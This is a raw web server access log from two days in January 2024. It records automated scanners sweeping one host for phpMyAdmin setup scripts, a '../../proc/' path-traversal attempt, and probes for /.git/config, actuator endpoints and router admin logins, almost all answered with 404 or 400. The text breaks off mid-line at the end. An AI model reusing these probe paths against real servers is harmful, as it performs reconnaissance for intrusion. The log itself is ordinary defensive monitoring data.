"-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:29 -0600] "GET http://67.218.15.25:80/webdb/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:30 -0600] "GET http://67.218.15.25:80/websql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:30 -0600] "GET http://67.218.15.25:80/_phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:31 -0600] "GET http://67.218.15.25:80/php/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:31 -0600] "GET http://67.218.15.25:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:32 -0600] "GET http://67.218.15.25:80/db/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:32 -0600] "GET http://67.218.15.25:80/sqlmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:37 -0600] "GET http://67.218.15.25:80/phpmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:38 -0600] "GET http://67.218.15.25:80/php-myadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:38 -0600] "GET http://67.218.15.25:80/phpmy-admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:42 -0600] "GET http://67.218.15.25:80/mysql-admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-"

91.92.243.232 - - [01/Jan/2024:10:25:21 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 91.92.243.232 - - [01/Jan/2024:10:25:26 -0600] "GET ../../proc/ HTTP" 400 0 "-" "-"

66.240.236.109 - - [01/Jan/2024:10:40:16 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 zgrab/0.x"

122.224.83.80 - - [01/Jan/2024:10:47:01 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"

121.4.195.240 - - [01/Jan/2024:10:50:20 -0600] "GET http://67.218.15.25:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:50:21 -0600] "GET http://67.218.15.25:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:50:22 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:50:23 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:50:23 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:50:24 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:50:25 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:50:26 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:50:28 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:50:29 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:50:30 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:50:33 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:50:34 -0600] "GET http://67.218.15.25:80/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:50:35 -0600] "GET http://67.218.15.25:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:50:35 -0600] "GET http://67.218.15.25:80/myadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:50:36 -0600] "GET http://67.218.15.25:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:50:52 -0600] "GET http://67.218.15.25:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:50:52 -0600] "GET http://67.218.15.25:80/mysqladmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:50:53 -0600] "GET http://67.218.15.25:80/SQL/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:50:54 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:50:54 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:50:55 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:50:57 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:50:57 -0600] "GET http://67.218.15.25:80/admin/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:51:01 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:51:02 -0600] "GET http://67.218.15.25:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:51:02 -0600] "GET http://67.218.15.25:80/webadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:51:03 -0600] "GET http://67.218.15.25:80/admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:51:04 -0600] "GET http://67.218.15.25:80/dbadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:51:05 -0600] "GET http://67.218.15.25:80/mysql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:51:05 -0600] "GET http://67.218.15.25:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:51:07 -0600] "GET http://67.218.15.25:80/phpma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:51:07 -0600] "GET http://67.218.15.25:80/sqlweb/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:51:15 -0600] "GET http://67.218.15.25:80/webdb/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:51:16 -0600] "GET http://67.218.15.25:80/websql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:51:16 -0600] "GET http://67.218.15.25:80/_phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:51:17 -0600] "GET http://67.218.15.25:80/php/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:51:48 -0600] "GET http://67.218.15.25:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:51:49 -0600] "GET http://67.218.15.25:80/db/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:51:50 -0600] "GET http://67.218.15.25:80/sqlmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:51:51 -0600] "GET http://67.218.15.25:80/mysqlmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:51:52 -0600] "GET http://67.218.15.25:80/phpmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:51:53 -0600] "GET http://67.218.15.25:80/php-myadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:51:55 -0600] "GET http://67.218.15.25:80/phpmy-admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 121.4.195.240 - - [01/Jan/2024:10:52:02 -0600] "GET http://67.218.15.25:80/mysql-admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-"

220.180.196.41 - - [01/Jan/2024:10:54:36 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"

43.136.107.134 - - [01/Jan/2024:14:45:30 -0600] "GET http://67.218.15.25:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:31 -0600] "GET http://67.218.15.25:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:31 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:33 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:33 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:33 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:34 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:34 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:35 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:35 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:36 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:36 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:36 -0600] "GET http://67.218.15.25:80/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:37 -0600] "GET http://67.218.15.25:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:37 -0600] "GET http://67.218.15.25:80/myadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:38 -0600] "GET http://67.218.15.25:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:38 -0600] "GET http://67.218.15.25:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:38 -0600] "GET http://67.218.15.25:80/mysqladmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:39 -0600] "GET http://67.218.15.25:80/SQL/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:39 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:40 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:40 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:41 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:41 -0600] "GET http://67.218.15.25:80/admin/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:42 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:42 -0600] "GET http://67.218.15.25:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:42 -0600] "GET http://67.218.15.25:80/webadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:44 -0600] "GET http://67.218.15.25:80/admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:44 -0600] "GET http://67.218.15.25:80/dbadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:45 -0600] "GET http://67.218.15.25:80/mysql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:45 -0600] "GET http://67.218.15.25:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:45 -0600] "GET http://67.218.15.25:80/phpma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:46 -0600] "GET http://67.218.15.25:80/sqlweb/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:46 -0600] "GET http://67.218.15.25:80/webdb/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:47 -0600] "GET http://67.218.15.25:80/websql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:47 -0600] "GET http://67.218.15.25:80/_phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:48 -0600] "GET http://67.218.15.25:80/php/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:48 -0600] "GET http://67.218.15.25:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:48 -0600] "GET http://67.218.15.25:80/db/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:49 -0600] "GET http://67.218.15.25:80/sqlmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:50 -0600] "GET http://67.218.15.25:80/mysqlmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:51 -0600] "GET http://67.218.15.25:80/phpmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:51 -0600] "GET http://67.218.15.25:80/php-myadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:52 -0600] "GET http://67.218.15.25:80/phpmy-admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.136.107.134 - - [01/Jan/2024:14:45:52 -0600] "GET http://67.218.15.25:80/mysql-admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-"

2.57.122.161 - - [01/Jan/2024:14:46:27 -0600] "GET /op/9_md/9/9/9/9/9 HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x"

162.243.139.36 - - [01/Jan/2024:15:28:08 -0600] "GET /hudson HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x"

87.236.176.110 - - [01/Jan/2024:15:51:22 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"

66.240.205.34 - - [01/Jan/2024:15:59:15 -0600] "Gh0st\xad" 400 0 "-" "-"

91.92.243.232 - - [01/Jan/2024:16:23:17 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 91.92.243.232 - - [01/Jan/2024:16:23:27 -0600] "GET ../../proc/ HTTP" 400 0 "-" "-"

165.154.244.21 - - [01/Jan/2024:18:17:50 -0600] "\x16\x03\x01" 400 0 "-" "-" 165.154.244.21 - - [01/Jan/2024:18:18:00 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 165.154.244.21 - - [01/Jan/2024:18:18:06 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"

45.142.182.103 - - [01/Jan/2024:18:31:03 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

162.216.149.190 - - [01/Jan/2024:18:48:32 -0600] "GET / HTTP/1.1" 200 241 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

35.187.98.121 - - [01/Jan/2024:19:17:37 -0600] "GET / HTTP/1.1" 200 297 "-" "python-requests/2.31.0"

198.244.213.98 - - [01/Jan/2024:19:30:50 -0600] "\x16\x03\x01" 400 0 "-" "-" 198.244.213.98 - - [01/Jan/2024:19:30:50 -0600] "\x16\x03\x01" 400 0 "-" "-" 198.244.213.98 - - [01/Jan/2024:19:31:03 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20120502 Firefox/12.0 SeaMonkey/2.9.1"

183.196.214.38 - - [01/Jan/2024:20:14:56 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"

52.81.239.40 - - [01/Jan/2024:20:26:10 -0600] "GET /.git/config HTTP/1.1" 404 435 "-" "Go-http-client/1.1"

192.155.88.231 - - [01/Jan/2024:20:55:37 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 zgrab/0.x"

45.79.181.251 - - [01/Jan/2024:20:59:58 -0600] "\x16\x03\x01" 400 0 "-" "-"

31.220.88.155 - - [01/Jan/2024:22:11:10 -0600] "\x16\x03\x01\x01\xc0\x01" 400 0 "-" "-" 31.220.88.155 - - [01/Jan/2024:22:26:02 -0600] "GET /admin/config.php HTTP/1.0" 404 454 "-" "xfa1"

205.210.31.52 - - [01/Jan/2024:22:28:10 -0600] "\x16\x03\x01" 400 0 "-" "-" 205.210.31.52 - - [01/Jan/2024:22:28:10 -0600] "\x16\x03\x01" 400 0 "-" "-"

45.142.182.103 - - [01/Jan/2024:22:32:06 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

104.152.52.199 - - [01/Jan/2024:23:01:38 -0600] "GET / HTTP/1.0" 200 260 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"

184.105.247.194 - - [01/Jan/2024:23:24:35 -0600] "\x16\x03\x01" 400 0 "-" "-"

178.128.44.148 - - [01/Jan/2024:23:28:41 -0600] "\x16\x03\x01\x01\xfb\x01" 400 0 "-" "-"

January 2, 2024

23.251.102.74 - - [02/Jan/2024:00:53:31 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"

149.50.96.45 - - [02/Jan/2024:00:58:32 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

198.235.24.122 - - [02/Jan/2024:02:36:07 -0600] "GET / HTTP/1.0" 200 260 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

89.190.156.10 - - [02/Jan/2024:03:07:08 -0600] "POST /boaform/admin/formLogin HTTP/1.1" 404 491 "http://67.218.15.25:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"

83.97.73.245 - - [02/Jan/2024:03:31:28 -0600] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

107.170.246.30 - - [02/Jan/2024:03:36:38 -0600] "GET /portal/redlion HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x"

137.184.255.53 - - [02/Jan/2024:04:26:31 -0600] "GET /actuator/health HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x"

162.243.148.6 - - [02/Jan/2024:04:43:25 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 zgrab/0.x"

192.241.211.45 - - [02/Jan/2024:04:50:03 -0600] "MGLNDD_67.218.15.25_80\n" 400 0 "-" "-"

83.97.73.245 - - [02/Jan/2024:05:03:46 -0600] "GET /actuator/gateway/routes HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

188.94.33.191 - - [02/Jan/2024:05:12:13 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"

65.49.1.28 - - [02/Jan/2024:06:03:44 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0" 65.49.1.31 - - [02/Jan/2024:06:05:21 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15" 65.49.1.32 - - [02/Jan/2024:06:06:01 -0600] "GET /geoserver/web/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0"

180.109.105.125 - - [02/Jan/2024:06:30:47 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"

111.26.72.177 - - [02/Jan/2024:06:52:10 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"

43.142.81.31 - - [02/Jan/2024:07:09:19 -0600] "GET http://67.218.15.25:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:09:20 -0600] "GET http://67.218.15.25:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:09:22 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:09:23 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:09:23 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:09:24 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:09:27 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:09:28 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:09:28 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:09:29 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:09:29 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:09:30 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:09:30 -0600] "GET http://67.218.15.25:80/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:09:31 -0600] "GET http://67.218.15.25:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:09:31 -0600] "GET http://67.218.15.25:80/myadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:09:33 -0600] "GET http://67.218.15.25:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:09:33 -0600] "GET http://67.218.15.25:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:09:57 -0600] "GET http://67.218.15.25:80/mysqladmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:09:58 -0600] "GET http://67.218.15.25:80/SQL/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:10:03 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:10:05 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:10:10 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:10:10 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:10:11 -0600] "GET http://67.218.15.25:80/admin/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:10:11 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:10:12 -0600] "GET http://67.218.15.25:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:10:13 -0600] "GET http://67.218.15.25:80/webadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:10:13 -0600] "GET http://67.218.15.25:80/admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:10:18 -0600] "GET 